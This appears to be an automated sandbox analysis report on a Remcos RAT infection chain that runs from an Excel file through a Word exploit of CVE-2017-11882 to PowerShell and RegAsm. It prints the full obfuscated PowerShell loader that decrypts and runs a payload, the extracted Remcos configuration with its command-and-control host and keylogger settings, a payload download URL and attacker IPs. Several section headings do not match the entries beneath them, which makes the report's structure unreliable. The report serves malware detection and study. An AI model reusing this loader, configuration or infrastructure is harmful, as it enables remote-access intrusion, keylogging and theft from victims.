            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2504, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3240, TargetFilename: C:\Users\user\AppData\Local\Temp\eyxcmf0f.2tf.ps1

            Stealing of Sensitive Information

            Source: Registry Key set, Author: Joe Security: Data: Details: CC C0 05 F8 36 77 FF 59 27 3F 52 CE FC 6B 29 F4 01 51 C6 7F D4 F9 81 6A A4 65 7F 05 A3 94 9F E7 97 F1 FE 17 20 A1 AD 1D 85 9E 4E 18 5D 5C 03 79 AD E1 C1 0E 06 23 D4 2A 0B 82 5C BA BD 87 A8 1F E6 3B 36 83 8F E7 02 1D C7 DD 21 B7 96 67 AA 0D B6 E4 7B EA 7A 65 6B D5 78 8A 95 65 C7 B4 90 4A 85 E2 73 85 16 4A 78 E7 49 AF 8E 2F 63 5C F9 16 16 23 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3384, TargetObject: HKEY_CURRENT_USER\Software\Rmc-999Z97\exepath
            No Snort rule has matched
            Timestamp: 2024-07-26T13:09:04.026573+0200, SID: 2803304, Source Port: 49174, Destination Port: 80, Protocol: TCP, Classtype: Unknown Traffic
            Timestamp: 2024-07-26T13:08:58.500549+0200, SID: 2049038, Source Port: 80, Destination Port: 49171, Protocol: TCP, Classtype: A Network Trojan was detected
            Timestamp: 2024-07-26T13:08:59.714462+0200, SID: 2020424, Source Port: 80, Destination Port: 49172, Protocol: TCP, Classtype: Exploit Kit Activity Detected
            Timestamp: 2024-07-26T13:08:57.397604+0200, SID: 2047750, Source Port: 80, Destination Port: 49171, Protocol: TCP, Classtype: A Network Trojan was detected
            Timestamp: 2024-07-26T13:09:01.750905+0200, SID: 2036594, Source Port: 49173, Destination Port: 14645, Protocol: TCP, Classtype: Malware Command and Control Activity Detected

            AV Detection

            Source: http://198.46.176.133/Upload/vbs.jpeg, Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.doc, Avira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc, Avira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp, Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Source: 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-999Z97", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "nots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Source: AWD 490104998518.xls, ReversingLabs: Detection: 28%
            Source: Yara match, File source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000C.00000002.1053847847.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTR
            Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
            Source: AWD 490104998518.xls, Joe Sandbox ML: detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_00433837
            Source: powershell.exe, 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_b18ad6bd-a

            Exploits

            Source: Yara match, File source: 10.2.powershell.exe.41fd080.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 10.2.powershell.exe.41fd080.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3240, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 3384, type: MEMORYSTR
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Network connect: IP: 192.3.176.174 Port: 80
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Windows\SysWOW64\wscript.exe
            Source: ~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp.4.dr, Stream path '_1783482884/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp.4.dr, Stream path '_1783482888/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp.4.dr, Stream path '_1783482909/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp.4.dr, Stream path '_1783482910/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp.4.dr, Stream path '_1783482912/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

            Privilege Escalation

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 12_2_004074FD _wcslen,CoGetObject,12_2_004074FD
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0044E879 FindFirstFileExA,12_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040783C FindFirstFileW,FindNextFileW,12_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407C97

            Software Vulnerabilities

            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: global traffic DNS query: name: tny.wtf
            Source: global traffic DNS query: name: sembe.duckdns.org
            Source: global traffic DNS query: name: geoplugin.net
            Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
            Source: global traffic TCP traffic: 192.168.2.22:49166 -> 192.3.176.174:80
            Source: global traffic TCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.46.176.133:80
            Source: global traffic TCP traffic: 192.168.2.22:49172 -> 192.3.176.174:80
            Source: global traffic TCP traffic: 192.168.2.22:49174 -> 178.237.33.50:80
            Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
            Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
